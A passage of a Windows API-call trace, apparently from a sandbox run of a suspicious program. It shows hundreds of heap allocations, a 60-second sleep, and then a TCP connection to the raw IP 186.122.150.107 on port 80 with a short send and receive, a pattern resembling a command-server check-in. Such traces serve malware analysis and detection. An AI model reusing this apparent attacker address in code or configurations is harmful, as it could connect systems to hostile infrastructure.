(HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2009868 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x200b208 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067c18 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067d60 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x20683c8 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2068a30 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067988 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067ad0 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067ea8 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2066f48 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2068280 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067090 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2067840 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200d958 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200cd28 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200dbc8 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200e318 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200ce60 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200c5d8 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200d0d0 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x200c710 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20691c0 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x206a198 [0133.951] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2068f50 [0133.956] Sleep (dwMilliseconds=0xea60) [0143.993] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0143.993] socket (af=2, type=1, protocol=6) returned 0x200 [0143.994] htons (hostshort=0x50) returned 0x5000 [0143.994] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0143.994] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0143.994] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0143.995] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0143.995] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0143.995] connect (s=0x200, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0144.251] send (s=0x200, buf=0x19d8f8*, len=203, flags=0) returned 203 [0144.251] recv (in: s=0x200, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0144.515] closesocket (s=0x200) returned 0 [0144.516] WSACleanup () returned 0 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2097448 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x209a190 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x209aa30 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x209ae80 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x209b0a8 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2097670 [0144.516] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2175a18 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21746b0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2173570 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21748d8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2175178 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21753a0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2173be8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2174f50 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21739c0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2174d28 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2174488 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2174038 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2175c40 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2173e10 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2174260 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21755c8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2172aa8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2173798 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2172ef8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2173120 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2175e68 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2174b00 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21757f0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2176090 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209e100 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209e510 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209def8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209c8a0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209be78 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209c490 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209e718 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209d4d0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209ceb8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209d0c0 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209e308 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209eb28 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209caa8 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209e920 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209f140 [0144.517] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x209ed30 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20a0418 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20a11e0 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x209f848 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20a0220 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20a0028 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x209f650 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x209fa40 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x209fe30 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20a0808 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2177e30 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2178028 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2176a80 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2177a40 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2176888 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2176c78 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2178610 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a2f10 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a30f8 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a2770 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a1a18 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a1830 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a1460 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a2958 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a1c00 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20a1648 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2179400 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2179218 [0144.518] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2178c60 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21799b8 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2178a78 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21795e8 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2178e48 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a4150 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a3640 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a4328 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a3818 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a39f0 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a3bc8 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a3da0 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a4a88 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a48b0 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a4c60 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a4e38 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a5010 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a51e8 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x20a3468 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x217bce0 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x217b758 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a6d60 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a6f28 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a70f0 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a5800 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a5b90 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a5470 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a59c8 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a5d58 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a5f20 [0144.519] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a6478 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a62b0 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a6640 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a6808 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20a69d0 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x217d350 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x217de00 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x20a7630 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x20a77e8 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217f140 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217f2f8 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217edd0 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217e8a8 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217f9d8 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217f4b0 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2180270 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217ea60 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217f668 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217fb90 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217fd48 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2180428 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217f820 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x217ff00 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20ab0a8 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20a9480 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20a97d0 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20a9978 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20a9b20 [0144.520] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20aa018 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21808b0 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2182330 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2182188 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2180c00 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2181ae8 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2182680 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2180da8 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2180a58 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2181c90 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2181940 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20abc80 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20abfb0 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20ac148 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20ac610 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20ac940 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20ad138 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20acad8 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20ace08 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20acc70 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20acfa0 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21840a0 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2183a40 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2183bd8 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2182d80 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2184700 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21838a8 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ad618 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ae6f0 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ae878 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20addc0 [0144.521] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ad490 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20aea00 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20adf48 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ad7a0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20aee98 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ae0d0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20ad928 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2184bd0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2184ee0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x21865d8 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x21851f0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2185068 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b04c0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20af900 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b0348 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20af498 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b0058 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b0638 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20afbf0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b01d0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b0d90 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20afd68 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20afee0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20af610 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b07b0 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b0928 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20b0f08 [0144.522] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2187020 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b2418 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b1608 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b26e8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b1fe0 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b22b0 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b2580 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b2df0 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b2850 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b29b8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b2f58 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b1ba8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b2c88 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b30c0 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b3228 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b14a0 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20b1770 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x20886a8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2189390 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2188e30 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2189640 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2189e50 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21894e8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2189cf8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2188b80 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2188a28 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2189798 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x218a100 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21898f0 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2188cd8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2189fa8 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x218a660 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x218a258 [0144.523] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x208a9d8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x208a890 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2089a78 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x208a370 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x208a4b8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218bd58 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218c508 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218bea0 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218bfe8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218af40 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, 